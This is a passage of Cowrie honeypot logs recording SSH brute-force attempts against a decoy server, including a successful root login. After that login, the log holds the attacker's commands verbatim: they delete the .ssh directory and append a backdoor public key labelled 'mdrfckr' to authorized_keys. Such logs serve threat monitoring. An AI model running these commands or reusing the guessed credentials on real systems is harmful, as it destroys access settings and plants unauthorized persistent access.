sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:03:50.302313Z","src_ip":"134.199.174.250","session":"b97f4bc974a5"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"admin123","message":"login attempt [tomcat/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:03:51.328308Z","src_ip":"134.199.174.250","session":"b97f4bc974a5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:03:52.657295Z","src_ip":"134.199.174.250","session":"b97f4bc974a5"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-08T14:04:15.650006Z","src_ip":"212.227.235.229","session":"ab66d0c0b830"}
{"eventid":"cowrie.session.closed","duration":"98.4","message":"Connection lost after 98.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:15.651967Z","src_ip":"212.227.235.229","session":"ab66d0c0b830"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7c1a8e29280","protocol":"ssh","message":"New connection: 134.199.174.250:48886 (1.2.3.4:22) [session: c7c1a8e29280]","sensor":"my-vps","timestamp":"2025-09-08T14:04:19.421134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:04:19.422032Z","src_ip":"134.199.174.250","session":"c7c1a8e29280"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:04:19.719192Z","src_ip":"134.199.174.250","session":"c7c1a8e29280"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1234","message":"login attempt [tomcat/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T14:04:20.756624Z","src_ip":"134.199.174.250","session":"c7c1a8e29280"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:22.056064Z","src_ip":"134.199.174.250","session":"c7c1a8e29280"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48814,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a9bb766938d","protocol":"telnet","message":"New connection: 212.227.235.229:48814 (1.2.3.4:23) [session: 5a9bb766938d]","sensor":"my-vps","timestamp":"2025-09-08T14:04:32.298351Z"}
{"eventid":"cowrie.session.closed","duration":12.667119026184082,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:44.965368Z","src_ip":"212.227.235.229","session":"5a9bb766938d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51052,"dst_ip":"1.2.3.4","dst_port":22,"session":"19ae89354569","protocol":"ssh","message":"New connection: 134.199.174.250:51052 (1.2.3.4:22) [session: 19ae89354569]","sensor":"my-vps","timestamp":"2025-09-08T14:04:49.288671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:04:49.289560Z","src_ip":"134.199.174.250","session":"19ae89354569"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:04:49.580103Z","src_ip":"134.199.174.250","session":"19ae89354569"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123","message":"login attempt [tomcat/123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:04:50.576764Z","src_ip":"134.199.174.250","session":"19ae89354569"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59696,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0504f494006","protocol":"ssh","message":"New connection: 212.227.235.229:59696 (1.2.3.4:22) [session: c0504f494006]","sensor":"my-vps","timestamp":"2025-09-08T14:04:50.929399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:04:50.930043Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:04:51.153641Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:51.876069Z","src_ip":"134.199.174.250","session":"19ae89354569"}
{"eventid":"cowrie.login.success","username":"root","password":"1234455","message":"login attempt [root/1234455] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:04:52.089900Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:04:52.563460Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:04:52.564134Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:04:52.565218Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:52.791278Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:04:53.333559Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:04:53.334211Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:04:53.565282Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:53.566125Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60700,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddf6ce8253a2","protocol":"ssh","message":"New connection: 212.227.235.229:60700 (1.2.3.4:22) [session: ddf6ce8253a2]","sensor":"my-vps","timestamp":"2025-09-08T14:04:53.789198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:04:53.790024Z","src_ip":"212.227.235.229","session":"ddf6ce8253a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:04:54.014190Z","src_ip":"212.227.235.229","session":"ddf6ce8253a2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:04:54.955447Z","src_ip":"212.227.235.229","session":"ddf6ce8253a2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:56.187358Z","src_ip":"212.227.235.229","session":"ddf6ce8253a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33376,"dst_ip":"1.2.3.4","dst_port":22,"session":"791874b2d33a","protocol":"ssh","message":"New connection: 212.227.235.229:33376 (1.2.3.4:22) [session: 791874b2d33a]","sensor":"my-vps","timestamp":"2025-09-08T14:04:56.410726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:04:56.411391Z","src_ip":"212.227.235.229","session":"791874b2d33a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:04:56.642569Z","src_ip":"212.227.235.229","session":"791874b2d33a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:04:57.592017Z","src_ip":"212.227.235.229","session":"791874b2d33a"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:57.821940Z","src_ip":"212.227.235.229","session":"c0504f494006"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:04:57.823218Z","src_ip":"212.227.235.229","session":"791874b2d33a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56108,"dst_ip":"1.2.3.4","dst_port":22,"session":"32bb7cd2b009","protocol":"ssh","message":"New connection: 134.199.174.250:56108 (1.2.3.4:22) [session: 32bb7cd2b009]","sensor":"my-vps","timestamp":"2025-09-08T14:05:18.846988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:05:18.848104Z","src_ip":"134.199.174.250","session":"32bb7cd2b009"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:05:19.186900Z","src_ip":"134.199.174.250","session":"32bb7cd2b009"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"qwerty123","message":"login attempt [tomcat/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:05:20.361644Z","src_ip":"134.199.174.250","session":"32bb7cd2b009"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:05:21.737945Z","src_ip":"134.199.174.250","session":"32bb7cd2b009"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56178,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dd17d4f82f7","protocol":"ssh","message":"New connection: 134.199.174.250:56178 (1.2.3.4:22) [session: 5dd17d4f82f7]","sensor":"my-vps","timestamp":"2025-09-08T14:05:48.132631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:05:48.175587Z","src_ip":"134.199.174.250","session":"5dd17d4f82f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:05:48.524953Z","src_ip":"134.199.174.250","session":"5dd17d4f82f7"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1q2w3e4r","message":"login attempt [tomcat/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T14:05:49.785647Z","src_ip":"134.199.174.250","session":"5dd17d4f82f7"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:05:51.128759Z","src_ip":"134.199.174.250","session":"5dd17d4f82f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57044,"dst_ip":"1.2.3.4","dst_port":22,"session":"428b5c7ef165","protocol":"ssh","message":"New connection: 212.227.235.229:57044 (1.2.3.4:22) [session: 428b5c7ef165]","sensor":"my-vps","timestamp":"2025-09-08T14:06:12.329368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:06:12.333482Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
